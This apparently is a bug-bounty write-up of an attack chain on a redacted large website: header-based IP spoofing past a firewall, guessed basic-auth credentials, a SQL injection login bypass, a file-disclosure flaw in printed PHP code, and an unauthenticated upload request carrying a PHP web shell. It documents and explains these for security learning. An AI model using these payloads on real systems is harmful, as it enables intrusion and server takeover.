IP spoofing FTW

Table of Contents

Starting from the bottom

Today, i will talk about a really huge company with millions of accounts and millions peoples going there every day !

At the beginning, the website was looking secure, the most annoying part was that they were using Datadome.

On my FFUF, i often use my own “config” (Exotics User-Agent, special headers, …) and, when i launched it, i discovered that it wasn’t blocked by Datadome and, also, that it have access to extra files i didn’t have access to (403 Forbidden).

After looking about what happened here, i discovered that it was because of the X-Forwarded-For header with 127.0.0.1 as value.

Thanks to this, i was able to fully bypass the firewall but, also, have access to special endpoints /server_info and /server-status among other things (There was a 401).

After some try harding on this 401, i finally found out that the extra protection was simply the company name as user / password…

Gathering intel is the key

I then dug into the found informations and, i discovered interesting things:

  • All the admin endpoints
  • The allowed IPs for these

Here is an example of the /server-info endpoint which allowed me to see the authorized IPs (Obviously, i replaced them with dummy IPs):

<Location "/webteam-admin">
	order deny,allow
	deny from all
	allow from 63.45.67.89/30
	allow from 63.78.56.12/29
	allow from 63.34.12.99/30
	allow from 63.67.89.123/29
</Location>
<Location "/webadmin-store">
	order deny,allow
	deny from all
	allow from 63.98.76.54/30
	allow from 63.34.56.200/29
	allow from 63.234.56.23/30
	allow from 63.12.45.67/29
	allow from 63.56.78.34
	allow from 185.34.56.200
	allow from 63.78.56.12/29
<Location>

Going where no-one has ever gone

After adding one of these IP to my X-Forwarded-For header, i crawled the admin endpoints…

Nothing much to see at first sight excepted authentifications areas login / password.

Beginning with /webteam-admin, i try some things and, bingo, there is an SQL Injection !
A basic payload like admin'--+- is enough to connect me as admin…

I try to do it again on /webadmin-store but without success.
Launching my favorite tool again (ffuf), i find some JS files.

Digging it it, i found out that it’s possible to retrieve PDF files by using action=pdf on the endpoint /webadmin-store/pdf.php.

I try it and, again, there seems to be no protection at all to verify the user is connected. Also, there is a Local File Disclosure vulnerability on the parameter id letting me retrieve any files on the server :)

It was possible to use / but, in some case, this special char is not allowed.
That is why i always say that you should first try to download the file you’re using (in this case, pdf.php).
Seeing how the code is done, we could have bypassed the / restriction by using _ if necessary:

header('Content-type: application/pdf');
header('Content-Disposition: inline; filename=doc.pdf');
header('Last-Modified: '.gmdate('D, d M Y H:i:s') . ' GMT');
header('Cache-Control: no-store, no-cache, must-revalidate');
header('Cache-Control: pre-check=0, post-check=0, max-age=0');
header('Pragma: anytextexeptno-cache', true);
header('Cache-control: private');
header('Expires: 0');
readfile(str_replace("_", "/", $_REQUEST['id']));

To the moon

Obviously, there are much more to say about this host but, for the pleasure, i will speak a bit more about /webteam-admin where i got connected as admin. After this, my burp gathered many endpoints and JS files.

One of them particularily grabbed my attention… This one was linked with the vulnerability i spoke earlier (The Local File Disclosure) It’s frequent that, when you can retrieve bills, it’s also possible to upload them…

So i found the request to do it ! After crafting it, this is how it was looking like:

POST /webadmin-store/pdf.php HTTP/1.1
Host: [redacted]
Content-Type: multipart/form-data; boundary=----48456566655889104878740450005
Content-Length: 962


-----------------------------48456566655889104878740450005
Content-Disposition: form-data; name="action"

pdf
-----------------------------48456566655889104878740450005
Content-Disposition: form-data; name="type"

upload
-----------------------------48456566655889104878740450005
Content-Disposition: form-data; name="facture"; filename="Kuromatae.pdf"
Content-Type: application/octet-stream

<?php system("id");?>
-----------------------------48456566655889104878740450005
Content-Disposition: form-data; name="nomfacture"

kuromatae-zef48zef4zefvre1.php
-----------------------------48456566655889104878740450005
Content-Disposition: form-data; name="lienfacture"

?action=pdf&id=_var_www_redacted_assets_kuromatae-zef48zef4zefvre1.php
-----------------------------48456566655889104878740450005
Content-Disposition: form-data; name="pathfacture"

/var/www/[redacted]/assets/
-----------------------------48456566655889104878740450005--

As you can see here, there are multiple problems with this request:

  • No authentification checks
  • The possibility to name the file like we want to without restrictions
  • We could upload it anywhere we’d like to

The end ?

I found many other things but, i don’t think it’s useful to enumerate them here ! The goal was to see a little cool chain starting, again, by nothing much (a simple header)


Have a nice day :)
~ Kuromatae